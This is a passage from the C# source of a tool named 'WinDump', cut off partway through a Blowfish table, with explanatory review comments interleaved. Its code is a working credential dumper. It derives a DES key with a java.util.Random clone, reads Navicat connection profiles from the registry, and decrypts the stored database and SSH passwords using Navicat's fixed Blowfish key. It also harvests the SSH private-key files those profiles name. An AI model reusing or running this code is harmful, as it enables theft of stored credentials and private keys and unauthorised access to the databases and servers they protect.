97 |                 byte[] d = new byte[buf.Length - head.Length];
98 |                 Array.Copy(buf, head.Length, d, 0, d.Length);
99 |                 byte[] randombytes = ranDomKey(head);
100 |                 byte[] bt = desDecode(d, randombytes);
101 |                 return Encoding.UTF8.GetString(bt);
102 |
103 |
104 |             }
105 |         }
         // Derives 16 bytes of key material from the 8-byte header: two JavaRng generators
         // are seeded from header bytes and a fixed constant, eight 64-bit values (header
         // bytes mixed with generator output) are serialised big-endian, and the 64-byte
         // buffer is hashed with MD5. desDecode uses only the first 8 bytes of the result.
         // Returns null if writing to the buffer throws.
         // NOTE(review): nextInt(127) can return 0, which would make the division on the
         // first line throw DivideByZeroException.
106 |         static byte[] ranDomKey(byte[] head)
107 |         {
108 |             long ks = 3680984568597093857L / new JavaRng(head[5]).nextInt(127);
109 |             JavaRng random = new JavaRng(ks);
110 |             int t = head[0];
111 |
                 // head[0] selects how many outputs of the first generator are discarded.
112 |             for (int i = 0; i < t; ++i)
113 |             {
114 |                 random.nextLong();
115 |             }
116 |
117 |             long n = random.nextLong();
118 |             JavaRng r2 = new JavaRng(n);
119 |             long[] ld = new long[] { (long)head[4], r2.nextLong(), (long)head[7], (long)head[3], r2.nextLong(), (long)head[1], random.nextLong(), (long)head[2] };
120 |             using (MemoryStream stream = new MemoryStream())
121 |             {
122 |                 using (BinaryWriter writer = new BinaryWriter(stream))
123 |                 {
124 |                     long[] var15 = ld;
125 |                     int var14 = ld.Length;
126 |
127 |                     for (int var13 = 0; var13 < var14; ++var13)
128 |                     {
129 |                         long l = var15[var13];
130 |
131 |                         try
132 |                         {
                                 // Most significant byte first (big-endian), written by hand.
133 |                             byte[] writeBuffer = new byte[8];
134 |                             writeBuffer[0] = (byte)(l >> 56);
135 |                             writeBuffer[1] = (byte)(l >> 48);
136 |                             writeBuffer[2] = (byte)(l >> 40);
137 |                             writeBuffer[3] = (byte)(l >> 32);
138 |                             writeBuffer[4] = (byte)(l >> 24);
139 |                             writeBuffer[5] = (byte)(l >> 16);
140 |                             writeBuffer[6] = (byte)(l >> 8);
141 |                             writeBuffer[7] = (byte)(l >> 0);
142 |                             writer.Write(writeBuffer);
143 |                         }
144 |                         catch
145 |                         {
146 |                             return null;
147 |                         }
148 |                     }
149 |
150 |                     byte[] keyData = stream.ToArray();
151 |                     keyData = md5(keyData);
152 |                     return keyData;
153 |                 }
154 |             }
155 |         }
156 |
         // MD5 digest of `data`, or null if hashing throws. MD5 serves here only as a fixed
         // mixing step of the key derivation above.
157 |         internal static byte[] md5(byte[] data)
158 |         {
159 |             try
160 |             {
161 |                 MD5 md5Hash = MD5.Create();
162 |                 byte[] md5data = md5Hash.ComputeHash(data);
163 |                 return md5data;
164 |             }
165 |             catch
166 |             { return null; }
167 |         }
168 |
169 |     }
     // 48-bit linear congruential generator with the same multiplier (0x5DEECE66D),
     // increment (0xB) and seed scrambling as java.util.Random. It is deterministic for a
     // given seed and is not a cryptographic generator.
170 |     internal class JavaRng
171 |     {
         // Scrambles the seed with the multiplier and keeps the low 48 bits.
172 |         public JavaRng(long seed)
173 |         {
174 |             _seed = (seed ^ LARGE_PRIME) & ((1L << 48) - 1);
175 |         }
176 |
         // Combines two 32-bit outputs into one 64-bit value; the second is sign-extended
         // before the addition.
177 |         public long nextLong()
178 |         {
179 |             return ((long)next(32) << 32) + next(32);
180 |         }
181 |
         // Returns a value in [0, bound); throws ArgumentOutOfRangeException when bound is
         // not positive. For bounds that are not a power of two, candidates are redrawn until
         // the overflow test in the loop condition passes.
182 |         public int nextInt(int bound)
183 |         {
184 |             if (bound <= 0)
185 |                 throw new ArgumentOutOfRangeException("bound", bound, "bound must be positive");
186 |
187 |             int r = next(31);
188 |             int m = bound - 1;
189 |             if ((bound & m) == 0) // i.e., bound is a power of 2
190 |                 r = (int)((bound * (long)r) >> 31);
191 |             else
192 |             {
193 |                 for (int u = r;
194 |                      u - (r = u % bound) + m < 0;
195 |                      u = next(31))
196 |                     ;
197 |             }
198 |             return r;
199 |         }
200 |
         // Second bounded-integer routine written with a do/while loop. No call to it
         // appears in this file's visible code; ranDomKey uses the lower-case nextInt above.
201 |         public int NextInt(int n)
202 |         {
203 |             if (n <= 0)
204 |                 throw new ArgumentOutOfRangeException("n", n, "n must be positive");
205 |
206 |             if ((n & -n) == n) // i.e., n is a power of 2
207 |                 return (int)((n * (long)next(31)) >> 31);
208 |
209 |             int bits, val;
210 |
211 |             do
212 |             {
213 |                 bits = next(31);
214 |                 val = bits % n;
215 |             } while (bits - val + (n - 1) < 0);
216 |             return val;
217 |         }
218 |
         // Advances the 48-bit state and returns its top `bits` bits.
219 |         private int next(int bits)
220 |         {
221 |             _seed = (_seed * LARGE_PRIME + SMALL_PRIME) & ((1L << 48) - 1);
222 |             return (int)((_seed) >> (48 - bits));
223 |         }
224 |
225 |         private long _seed;
226 |
         // Used as the generator's multiplier and increment respectively.
227 |         private const long LARGE_PRIME = 0x5DEECE66DL;
228 |         private const long SMALL_PRIME = 0xBL;
229 |     }
230 | }
231 |
--------------------------------------------------------------------------------
/Cred/MobaXterm.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace WinDump
6 | {
     // Empty placeholder: the class has no members.
7 |     internal class MobaXterm
8 |     {
9 |     }
10 | }
11 |
--------------------------------------------------------------------------------
/Cred/Navicat.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Data;
5 | using System.IO;
6 | using System.Security.Cryptography;
7 | using
System.Text;
8 |
9 | namespace WinDump
10 | {
     // Reads Navicat connection profiles from the current user's registry hive.
     // NOTE(review): several declarations below read `Dictionary` / `KeyValuePair` with no
     // type arguments; the generic parameters look lost in extraction - confirm against the
     // original file.
11 |     internal class Navicat
12 |     {
13 |         internal static Navicat11Cipher cipher = new Navicat11Cipher();
         // Registry sub-key name under Software\PremiumSoft -> label written to the "Type"
         // column.
14 |         internal static readonly Dictionary names = new Dictionary
15 |         {
16 |             { "Navicat", "MySql" },
17 |             { "NavicatMSSQL", "SQL Server" },
18 |             { "NavicatORA", "Oracle" },
19 |             { "NavicatPG", "pgsql" },
20 |             { "NavicatMARIADB", "MariaDB" },
21 |             { "NavicatMONGODB","MongoDB"},
22 |             //{ "NavicatSQLite","SQLite"}
23 |         };
24 |
         // Returns one row per saved server found under
         // HKCU\Software\PremiumSoft\<product>\Servers\<server name>, for every product in
         // `names`. `dtkey` receives a Path/Content table with the text of each distinct SSH
         // private-key file referenced by those servers. Keys are opened read-only.
         // When the PremiumSoft key is absent the method returns early with both tables
         // empty.
         // Defensive relevance: enumeration of these registry keys by a process other than
         // Navicat is the observable event.
25 |         internal static DataTable GetNavicat(out DataTable dtkey)
26 |         {
27 |             DataTable dt = new DataTable();
28 |             dt.Columns.Add("Type");
29 |             dt.Columns.Add("Name");
30 |             dt.Columns.Add("Host");
31 |             dt.Columns.Add("Port");
32 |             dt.Columns.Add("User");
33 |             dt.Columns.Add("Pwd");
34 |             dt.Columns.Add("SSHHost");
35 |             dt.Columns.Add("SSHPort");
36 |             dt.Columns.Add("SSHUser");
37 |             dt.Columns.Add("SSHPwd");
38 |             dt.Columns.Add("SSHPhrase");
39 |             dt.Columns.Add("SSHKey");
40 |             dtkey = new DataTable();
41 |             dtkey.Columns.Add("Path");
42 |             dtkey.Columns.Add("Content");
43 |             var keyDict = new Dictionary();
44 |             using (var key = Registry.CurrentUser.OpenSubKey(@"Software\PremiumSoft", false))
45 |             {
46 |                 if (key == null)
47 |                 {
48 |                     return dt;
49 |                 }
50 |                 foreach(KeyValuePairitem in names){
51 |                     var regName = item.Key;
52 |                     var typName = item.Value;
53 |                     using (var subkey = key.OpenSubKey(regName+@"\Servers",false))
54 |                     {
55 |                         if(subkey == null)
56 |                         {
57 |                             continue;
58 |                         }
59 |                         foreach (var sername in subkey.GetSubKeyNames())
60 |                         {
61 |                             using (var serkey = subkey.OpenSubKey(sername,false))
62 |                             {
63 |                                 if(serkey == null)
64 |                                 {
65 |                                     continue;
66 |                                 }
67 |                                 DumpServer(dt,keyDict, serkey, typName,sername);
68 |                             }
69 |                         }
70 |
71 |                     }
72 |                 }
73 |
74 |             }
75 |             foreach(var item in keyDict){
76 |                 dtkey.Rows.Add(item.Key, item.Value);
77 |             }
78 |             return dt;
79 |         }
         // Adds one row for the server stored in `key`. "Pwd" is decoded with the shared
         // cipher. The SSH_* values are read only when UseSSH is a non-zero int;
         // SSH_Password and SSH_Passphrase are decoded the same way, and the file named by
         // SSH_PrivateKey is read once per distinct path into keyDict when it exists.
         // NOTE(review): "UserName" is read without a default, so `user` may be null;
         // DecryptString is not guarded, so a malformed stored value would throw.
80 |         internal static void DumpServer(DataTable dt, Dictionary keyDict,RegistryKey key,string typName,string sername)
81 |         {
82 |             var host = key.GetValue("Host","");
83 |             var port = key.GetValue("Port","");
84 |             var user = key.GetValue("UserName");
85 |             var pwd = cipher.DecryptString(key.GetValue("Pwd","").ToString());
86 |             var usessh = key.GetValue("UseSSH", 0);
87 |             string sshHost="",sshPort="",sshUser = "",sshPwd = "",sshPhrase = "",sshKey = "";
88 |             if (usessh is int && (int)usessh != 0)
89 |             {
90 |                 sshHost = key.GetValue("SSH_Host","").ToString();
91 |                 sshPort = key.GetValue("SSH_Port", 0).ToString();
92 |                 sshUser = key.GetValue("SSH_UserName", "").ToString();
93 |                 sshPwd = cipher.DecryptString(key.GetValue("SSH_Password", "").ToString());
94 |                 sshPhrase = cipher.DecryptString(key.GetValue("SSH_Passphrase", "").ToString());
95 |                 sshKey = key.GetValue("SSH_PrivateKey", "").ToString();
96 |                 if (sshKey.Length != 0 && !keyDict.ContainsKey(sshKey) && File.Exists(sshKey) )
97 |                 {
98 |                     keyDict[sshKey] = File.ReadAllText(sshKey);
99 |                 }
100 |
101 |
102 |             }
103 |             dt.Rows.Add(typName,sername, host,port,user,pwd,sshHost,sshPort,sshUser, sshPwd,sshPhrase, sshKey);
104 |         }
105 |     }
     // Decoder for the hex-encoded password values read above: Blowfish keyed with the
     // SHA-1 digest of a constant string, chained with a running XOR value.
     // Security note: the key is derived only from a literal in this file, so it is the same
     // wherever this code runs; the stored values are obfuscated rather than protected, and
     // the registry ACL is the only barrier.
106 |     internal class Navicat11Cipher
107 |     {
108 |
109 |         private BlowfishNavicat blowfishCipher;
110 |
111 |
112 |
         // In-place a[i] ^= b[i] for the first len bytes.
113 |         protected static void XorBytes(byte[] a, byte[] b, int len)
114 |         {
115 |             for (int i = 0; i < len; ++i)
116 |                 a[i] ^= b[i];
117 |         }
118 |
         // Keys the Blowfish instance with SHA-1 of the UTF-8 bytes of the literal below.
119 |         public Navicat11Cipher()
120 |         {
121 |             byte[] UserKey = Encoding.UTF8.GetBytes("3DC5CA39");
122 |             var sha1 = new SHA1CryptoServiceProvider();
123 |             sha1.TransformFinalBlock(UserKey, 0, UserKey.Length);
124 |             blowfishCipher = new BlowfishNavicat(sha1.Hash);
125 |         }
126 |
127 |
128 |
         // Decodes a hex string into UTF-8 text; "" is returned for empty input.
         // Utils.FromHex is defined elsewhere.
         // Chaining as implemented here: CV starts as Encrypt(FF FF FF FF FF FF FF FF). For
         // each full 8-byte block C: plaintext = Decrypt(C) XOR CV, then CV = CV XOR C.
         // A trailing partial block is XORed with Encrypt(CV) and only its left_len bytes
         // are emitted.
129 |         public string DecryptString(string ciphertext)
130 |         {
131 |             if (ciphertext.Length == 0)
132 |             {
133 |                 return "";
134 |             }
135 |             byte[] ciphertext_bytes = Utils.FromHex(ciphertext);
136 |
137 |             byte[] CV = new byte[] { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF };
138 |             blowfishCipher.Encrypt(CV, BlowfishNavicat.Endian.Big);
139 |
140 |             var ret = new MemoryStream();
141 |             int blocks_len = ciphertext_bytes.Length / BlowfishNavicat.BlockSize;
142 |             int left_len = ciphertext_bytes.Length % BlowfishNavicat.BlockSize;
143 |             byte[] temp = new byte[BlowfishNavicat.BlockSize];
144 |             byte[] temp2 = new byte[BlowfishNavicat.BlockSize];
145 |             for (int i = 0; i < blocks_len; ++i)
146 |             {
147 |                 Array.Copy(ciphertext_bytes, BlowfishNavicat.BlockSize * i, temp, 0, BlowfishNavicat.BlockSize);
                     // temp2 keeps the ciphertext block, because Decrypt overwrites temp in place.
148 |                 Array.Copy(temp, temp2, BlowfishNavicat.BlockSize);
149 |                 blowfishCipher.Decrypt(temp, BlowfishNavicat.Endian.Big);
150 |                 XorBytes(temp, CV, BlowfishNavicat.BlockSize);
151 |                 ret.Write(temp, 0, temp.Length);
152 |                 XorBytes(CV, temp2, BlowfishNavicat.BlockSize);
153 |             }
154 |
155 |             if (left_len != 0)
156 |             {
157 |                 Array.Clear(temp, 0, temp.Length);
158 |                 Array.Copy(ciphertext_bytes, BlowfishNavicat.BlockSize * blocks_len, temp, 0, left_len);
159 |                 blowfishCipher.Encrypt(CV, BlowfishNavicat.Endian.Big);
160 |                 XorBytes(temp, CV, BlowfishNavicat.BlockSize);
161 |                 ret.Write(temp,0,left_len);
162 |             }
163 |
164 |             return Encoding.UTF8.GetString(ret.ToArray());
165 |         }
166 |     }
     // Blowfish block cipher used by Navicat11Cipher (8-byte blocks, user key of 1 to 56
     // bytes per the constants below).
167 |     internal class BlowfishNavicat
168 |     {
169 |
170 |         public enum Endian { Little, Big };
171 |         public static readonly int MinUserKeyLength = 1;
172 |         public static readonly int MaxUserKeyLength = 56;
173 |         public static readonly int BlockSize = 8;
174 |
         // Initial P-array: 18 words.
175 |         private static readonly UInt32[] OriginPBox = new UInt32[] {
176 |             0x243F6A88, 0x85A308D3, 0x13198A2E, 0x03707344, 0xA4093822, 0x299F31D0,
177 |             0x082EFA98, 0xEC4E6C89, 0x452821E6, 0x38D01377, 0xBE5466CF, 0x34E90C6C,
178 |             0xC0AC29B7, 0xC97C50DD, 0x3F84D5B5, 0xB5470917, 0x9216D5D9, 0x8979FB1B
179 |         };
180 |
181 |         private static readonly UInt32[,] OriginSBox = new UInt32[4, 256] {
182 |             {
183 |                 0xD1310BA6, 0x98DFB5AC, 0x2FFD72DB, 0xD01ADFB7, 0xB8E1AFED, 0x6A267E96, 0xBA7C9045, 0xF12C7F99, 0x24A19947, 0xB3916CF7, 0x0801F2E2, 0x858EFC16, 0x636920D8, 0x71574E69, 0xA458FEA3, 0xF4933D7E,
184 |                 0x0D95748F, 0x728EB658, 0x718BCD58, 0x82154AEE, 0x7B54A41D,
0xC25A59B5, 0x9C30D539, 0x2AF26013, 0xC5D1B023, 0x286085F0, 0xCA417918, 0xB8DB38EF, 0x8E79DCB0, 0x603A180E, 0x6C9E0E8B, 0xB01E8A3E, 185 | 0xD71577C1, 0xBD314B27, 0x78AF2FDA, 0x55605C60, 0xE65525F3, 0xAA55AB94, 0x57489862, 0x63E81440, 0x55CA396A, 0x2AAB10B6, 0xB4CC5C34, 0x1141E8CE, 0xA15486AF, 0x7C72E993, 0xB3EE1411, 0x636FBC2A, 186 | 0x2BA9C55D, 0x741831F6, 0xCE5C3E16, 0x9B87931E, 0xAFD6BA33, 0x6C24CF5C, 0x7A325381, 0x28958677, 0x3B8F4898, 0x6B4BB9AF, 0xC4BFE81B, 0x66282193, 0x61D809CC, 0xFB21A991, 0x487CAC60, 0x5DEC8032, 187 | 0xEF845D5D, 0xE98575B1, 0xDC262302, 0xEB651B88, 0x23893E81, 0xD396ACC5, 0x0F6D6FF3, 0x83F44239, 0x2E0B4482, 0xA4842004, 0x69C8F04A, 0x9E1F9B5E, 0x21C66842, 0xF6E96C9A, 0x670C9C61, 0xABD388F0, 188 | 0x6A51A0D2, 0xD8542F68, 0x960FA728, 0xAB5133A3, 0x6EEF0B6C, 0x137A3BE4, 0xBA3BF050, 0x7EFB2A98, 0xA1F1651D, 0x39AF0176, 0x66CA593E, 0x82430E88, 0x8CEE8619, 0x456F9FB4, 0x7D84A5C3, 0x3B8B5EBE, 189 | 0xE06F75D8, 0x85C12073, 0x401A449F, 0x56C16AA6, 0x4ED3AA62, 0x363F7706, 0x1BFEDF72, 0x429B023D, 0x37D0D724, 0xD00A1248, 0xDB0FEAD3, 0x49F1C09B, 0x075372C9, 0x80991B7B, 0x25D479D8, 0xF6E8DEF7, 190 | 0xE3FE501A, 0xB6794C3B, 0x976CE0BD, 0x04C006BA, 0xC1A94FB6, 0x409F60C4, 0x5E5C9EC2, 0x196A2463, 0x68FB6FAF, 0x3E6C53B5, 0x1339B2EB, 0x3B52EC6F, 0x6DFC511F, 0x9B30952C, 0xCC814544, 0xAF5EBD09, 191 | 0xBEE3D004, 0xDE334AFD, 0x660F2807, 0x192E4BB3, 0xC0CBA857, 0x45C8740F, 0xD20B5F39, 0xB9D3FBDB, 0x5579C0BD, 0x1A60320A, 0xD6A100C6, 0x402C7279, 0x679F25FE, 0xFB1FA3CC, 0x8EA5E9F8, 0xDB3222F8, 192 | 0x3C7516DF, 0xFD616B15, 0x2F501EC8, 0xAD0552AB, 0x323DB5FA, 0xFD238760, 0x53317B48, 0x3E00DF82, 0x9E5C57BB, 0xCA6F8CA0, 0x1A87562E, 0xDF1769DB, 0xD542A8F6, 0x287EFFC3, 0xAC6732C6, 0x8C4F5573, 193 | 0x695B27B0, 0xBBCA58C8, 0xE1FFA35D, 0xB8F011A0, 0x10FA3D98, 0xFD2183B8, 0x4AFCB56C, 0x2DD1D35B, 0x9A53E479, 0xB6F84565, 0xD28E49BC, 0x4BFB9790, 0xE1DDF2DA, 0xA4CB7E33, 0x62FB1341, 0xCEE4C6E8, 194 | 0xEF20CADA, 0x36774C01, 0xD07E9EFE, 0x2BF11FB4, 0x95DBDA4D, 0xAE909198, 
0xEAAD8E71, 0x6B93D5A0, 0xD08ED1D0, 0xAFC725E0, 0x8E3C5B2F, 0x8E7594B7, 0x8FF6E2FB, 0xF2122B64, 0x8888B812, 0x900DF01C, 195 | 0x4FAD5EA0, 0x688FC31C, 0xD1CFF191, 0xB3A8C1AD, 0x2F2F2218, 0xBE0E1777, 0xEA752DFE, 0x8B021FA1, 0xE5A0CC0F, 0xB56F74E8, 0x18ACF3D6, 0xCE89E299, 0xB4A84FE0, 0xFD13E0B7, 0x7CC43B81, 0xD2ADA8D9, 196 | 0x165FA266, 0x80957705, 0x93CC7314, 0x211A1477, 0xE6AD2065, 0x77B5FA86, 0xC75442F5, 0xFB9D35CF, 0xEBCDAF0C, 0x7B3E89A0, 0xD6411BD3, 0xAE1E7E49, 0x00250E2D, 0x2071B35E, 0x226800BB, 0x57B8E0AF, 197 | 0x2464369B, 0xF009B91E, 0x5563911D, 0x59DFA6AA, 0x78C14389, 0xD95A537F, 0x207D5BA2, 0x02E5B9C5, 0x83260376, 0x6295CFA9, 0x11C81968, 0x4E734A41, 0xB3472DCA, 0x7B14A94A, 0x1B510052, 0x9A532915, 198 | 0xD60F573F, 0xBC9BC6E4, 0x2B60A476, 0x81E67400, 0x08BA6FB5, 0x571BE91F, 0xF296EC6B, 0x2A0DD915, 0xB6636521, 0xE7B9F9B6, 0xFF34052E, 0xC5855664, 0x53B02D5D, 0xA99F8FA1, 0x08BA4799, 0x6E85076A 199 | }, 200 | 201 | { 202 | 0x4B7A70E9, 0xB5B32944, 0xDB75092E, 0xC4192623, 0xAD6EA6B0, 0x49A7DF7D, 0x9CEE60B8, 0x8FEDB266, 0xECAA8C71, 0x699A17FF, 0x5664526C, 0xC2B19EE1, 0x193602A5, 0x75094C29, 0xA0591340, 0xE4183A3E, 203 | 0x3F54989A, 0x5B429D65, 0x6B8FE4D6, 0x99F73FD6, 0xA1D29C07, 0xEFE830F5, 0x4D2D38E6, 0xF0255DC1, 0x4CDD2086, 0x8470EB26, 0x6382E9C6, 0x021ECC5E, 0x09686B3F, 0x3EBAEFC9, 0x3C971814, 0x6B6A70A1, 204 | 0x687F3584, 0x52A0E286, 0xB79C5305, 0xAA500737, 0x3E07841C, 0x7FDEAE5C, 0x8E7D44EC, 0x5716F2B8, 0xB03ADA37, 0xF0500C0D, 0xF01C1F04, 0x0200B3FF, 0xAE0CF51A, 0x3CB574B2, 0x25837A58, 0xDC0921BD, 205 | 0xD19113F9, 0x7CA92FF6, 0x94324773, 0x22F54701, 0x3AE5E581, 0x37C2DADC, 0xC8B57634, 0x9AF3DDA7, 0xA9446146, 0x0FD0030E, 0xECC8C73E, 0xA4751E41, 0xE238CD99, 0x3BEA0E2F, 0x3280BBA1, 0x183EB331, 206 | 0x4E548B38, 0x4F6DB908, 0x6F420D03, 0xF60A04BF, 0x2CB81290, 0x24977C79, 0x5679B072, 0xBCAF89AF, 0xDE9A771F, 0xD9930810, 0xB38BAE12, 0xDCCF3F2E, 0x5512721F, 0x2E6B7124, 0x501ADDE6, 0x9F84CD87, 207 | 0x7A584718, 0x7408DA17, 0xBC9F9ABC, 0xE94B7D8C, 0xEC7AEC3A, 
0xDB851DFA, 0x63094366, 0xC464C3D2, 0xEF1C1847, 0x3215D908, 0xDD433B37, 0x24C2BA16, 0x12A14D43, 0x2A65C451, 0x50940002, 0x133AE4DD, 208 | 0x71DFF89E, 0x10314E55, 0x81AC77D6, 0x5F11199B, 0x043556F1, 0xD7A3C76B, 0x3C11183B, 0x5924A509, 0xF28FE6ED, 0x97F1FBFA, 0x9EBABF2C, 0x1E153C6E, 0x86E34570, 0xEAE96FB1, 0x860E5E0A, 0x5A3E2AB3, 209 | 0x771FE71C, 0x4E3D06FA, 0x2965DCB9, 0x99E71D0F, 0x803E89D6, 0x5266C825, 0x2E4CC978, 0x9C10B36A, 0xC6150EBA, 0x94E2EA78, 0xA5FC3C53, 0x1E0A2DF4, 0xF2F74EA7, 0x361D2B3D, 0x1939260F, 0x19C27960, 210 | 0x5223A708, 0xF71312B6, 0xEBADFE6E, 0xEAC31F66, 0xE3BC4595, 0xA67BC883, 0xB17F37D1, 0x018CFF28, 0xC332DDEF, 0xBE6C5AA5, 0x65582185, 0x68AB9802, 0xEECEA50F, 0xDB2F953B, 0x2AEF7DAD, 0x5B6E2F84, 211 | 0x1521B628, 0x29076170, 0xECDD4775, 0x619F1510, 0x13CCA830, 0xEB61BD96, 0x0334FE1E, 0xAA0363CF, 0xB5735C90, 0x4C70A239, 0xD59E9E0B, 0xCBAADE14, 0xEECC86BC, 0x60622CA7, 0x9CAB5CAB, 0xB2F3846E, 212 | 0x648B1EAF, 0x19BDF0CA, 0xA02369B9, 0x655ABB50, 0x40685A32, 0x3C2AB4B3, 0x319EE9D5, 0xC021B8F7, 0x9B540B19, 0x875FA099, 0x95F7997E, 0x623D7DA8, 0xF837889A, 0x97E32D77, 0x11ED935F, 0x16681281, 213 | 0x0E358829, 0xC7E61FD6, 0x96DEDFA1, 0x7858BA99, 0x57F584A5, 0x1B227263, 0x9B83C3FF, 0x1AC24696, 0xCDB30AEB, 0x532E3054, 0x8FD948E4, 0x6DBC3128, 0x58EBF2EF, 0x34C6FFEA, 0xFE28ED61, 0xEE7C3C73, 214 | 0x5D4A14D9, 0xE864B7E3, 0x42105D14, 0x203E13E0, 0x45EEE2B6, 0xA3AAABEA, 0xDB6C4F15, 0xFACB4FD0, 0xC742F442, 0xEF6ABBB5, 0x654F3B1D, 0x41CD2105, 0xD81E799E, 0x86854DC7, 0xE44B476A, 0x3D816250, 215 | 0xCF62A1F2, 0x5B8D2646, 0xFC8883A0, 0xC1C7B6A3, 0x7F1524C3, 0x69CB7492, 0x47848A0B, 0x5692B285, 0x095BBF00, 0xAD19489D, 0x1462B174, 0x23820E00, 0x58428D2A, 0x0C55F5EA, 0x1DADF43E, 0x233F7061, 216 | 0x3372F092, 0x8D937E41, 0xD65FECF1, 0x6C223BDB, 0x7CDE3759, 0xCBEE7460, 0x4085F2A7, 0xCE77326E, 0xA6078084, 0x19F8509E, 0xE8EFD855, 0x61D99735, 0xA969A7AA, 0xC50C06C2, 0x5A04ABFC, 0x800BCADC, 217 | 0x9E447A2E, 0xC3453484, 0xFDD56705, 0x0E1E9EC9, 0xDB73DBD3, 0x105588CD, 
0x675FDA79, 0xE3674340, 0xC5C43465, 0x713E38D8, 0x3D28F89E, 0xF16DFF20, 0x153E21E7, 0x8FB03D4A, 0xE6E39F2B, 0xDB83ADF7 218 | }, 219 | 220 | { 221 | 0xE93D5A68, 0x948140F7, 0xF64C261C, 0x94692934, 0x411520F7, 0x7602D4F7, 0xBCF46B2E, 0xD4A20068, 0xD4082471, 0x3320F46A, 0x43B7D4B7, 0x500061AF, 0x1E39F62E, 0x97244546, 0x14214F74, 0xBF8B8840, 222 | 0x4D95FC1D, 0x96B591AF, 0x70F4DDD3, 0x66A02F45, 0xBFBC09EC, 0x03BD9785, 0x7FAC6DD0, 0x31CB8504, 0x96EB27B3, 0x55FD3941, 0xDA2547E6, 0xABCA0A9A, 0x28507825, 0x530429F4, 0x0A2C86DA, 0xE9B66DFB, 223 | 0x68DC1462, 0xD7486900, 0x680EC0A4, 0x27A18DEE, 0x4F3FFEA2, 0xE887AD8C, 0xB58CE006, 0x7AF4D6B6, 0xAACE1E7C, 0xD3375FEC, 0xCE78A399, 0x406B2A42, 0x20FE9E35, 0xD9F385B9, 0xEE39D7AB, 0x3B124E8B, 224 | 0x1DC9FAF7, 0x4B6D1856, 0x26A36631, 0xEAE397B2, 0x3A6EFA74, 0xDD5B4332, 0x6841E7F7, 0xCA7820FB, 0xFB0AF54E, 0xD8FEB397, 0x454056AC, 0xBA489527, 0x55533A3A, 0x20838D87, 0xFE6BA9B7, 0xD096954B, 225 | 0x55A867BC, 0xA1159A58, 0xCCA92963, 0x99E1DB33, 0xA62A4A56, 0x3F3125F9, 0x5EF47E1C, 0x9029317C, 0xFDF8E802, 0x04272F70, 0x80BB155C, 0x05282CE3, 0x95C11548, 0xE4C66D22, 0x48C1133F, 0xC70F86DC, 226 | 0x07F9C9EE, 0x41041F0F, 0x404779A4, 0x5D886E17, 0x325F51EB, 0xD59BC0D1, 0xF2BCC18F, 0x41113564, 0x257B7834, 0x602A9C60, 0xDFF8E8A3, 0x1F636C1B, 0x0E12B4C2, 0x02E1329E, 0xAF664FD1, 0xCAD18115, 227 | 0x6B2395E0, 0x333E92E1, 0x3B240B62, 0xEEBEB922, 0x85B2A20E, 0xE6BA0D99, 0xDE720C8C, 0x2DA2F728, 0xD0127845, 0x95B794FD, 0x647D0862, 0xE7CCF5F0, 0x5449A36F, 0x877D48FA, 0xC39DFD27, 0xF33E8D1E, 228 | 0x0A476341, 0x992EFF74, 0x3A6F6EAB, 0xF4F8FD37, 0xA812DC60, 0xA1EBDDF8, 0x991BE14C, 0xDB6E6B0D, 0xC67B5510, 0x6D672C37, 0x2765D43B, 0xDCD0E804, 0xF1290DC7, 0xCC00FFA3, 0xB5390F92, 0x690FED0B, 229 | 0x667B9FFB, 0xCEDB7D9C, 0xA091CF0B, 0xD9155EA3, 0xBB132F88, 0x515BAD24, 0x7B9479BF, 0x763BD6EB, 0x37392EB3, 0xCC115979, 0x8026E297, 0xF42E312D, 0x6842ADA7, 0xC66A2B3B, 0x12754CCC, 0x782EF11C, 230 | 0x6A124237, 0xB79251E7, 0x06A1BBE6, 0x4BFB6350, 0x1A6B1018, 
0x11CAEDFA, 0x3D25BDD8, 0xE2E1C3C9, 0x44421659, 0x0A121386, 0xD90CEC6E, 0xD5ABEA2A, 0x64AF674E, 0xDA86A85F, 0xBEBFE988, 0x64E4C3FE, 231 | 0x9DBC8057, 0xF0F7C086, 0x60787BF8, 0x6003604D, 0xD1FD8346, 0xF6381FB0, 0x7745AE04, 0xD736FCCC, 0x83426B33, 0xF01EAB71, 0xB0804187, 0x3C005E5F, 0x77A057BE, 0xBDE8AE24, 0x55464299, 0xBF582E61, 232 | 0x4E58F48F, 0xF2DDFDA2, 0xF474EF38, 0x8789BDC2, 0x5366F9C3, 0xC8B38E74, 0xB475F255, 0x46FCD9B9, 0x7AEB2661, 0x8B1DDF84, 0x846A0E79, 0x915F95E2, 0x466E598E, 0x20B45770, 0x8CD55591, 0xC902DE4C, 233 | 0xB90BACE1, 0xBB8205D0, 0x11A86248, 0x7574A99E, 0xB77F19B6, 0xE0A9DC09, 0x662D09A1, 0xC4324633, 0xE85A1F02, 0x09F0BE8C, 0x4A99A025, 0x1D6EFE10, 0x1AB93D1D, 0x0BA5A4DF, 0xA186F20F, 0x2868F169, 234 | 0xDCB7DA83, 0x573906FE, 0xA1E2CE9B, 0x4FCD7F52, 0x50115E01, 0xA70683FA, 0xA002B5C4, 0x0DE6D027, 0x9AF88C27, 0x773F8641, 0xC3604C06, 0x61A806B5, 0xF0177A28, 0xC0F586E0, 0x006058AA, 0x30DC7D62, 235 | 0x11E69ED7, 0x2338EA63, 0x53C2DD94, 0xC2C21634, 0xBBCBEE56, 0x90BCB6DE, 0xEBFC7DA1, 0xCE591D76, 0x6F05E409, 0x4B7C0188, 0x39720A3D, 0x7C927C24, 0x86E3725F, 0x724D9DB9, 0x1AC15BB4, 0xD39EB8FC, 236 | 0xED545578, 0x08FCA5B5, 0xD83D7CD3, 0x4DAD0FC4, 0x1E50EF5E, 0xB161E6F8, 0xA28514D9, 0x6C51133C, 0x6FD5C7E7, 0x56E14EC4, 0x362ABFCE, 0xDDC6C837, 0xD79A3234, 0x92638212, 0x670EFA8E, 0x406000E0 237 | }, 238 | 239 | { 240 | 0x3A39CE37, 0xD3FAF5CF, 0xABC27737, 0x5AC52D1B, 0x5CB0679E, 0x4FA33742, 0xD3822740, 0x99BC9BBE, 0xD5118E9D, 0xBF0F7315, 0xD62D1C7E, 0xC700C47B, 0xB78C1B6B, 0x21A19045, 0xB26EB1BE, 0x6A366EB4, 241 | 0x5748AB2F, 0xBC946E79, 0xC6A376D2, 0x6549C2C8, 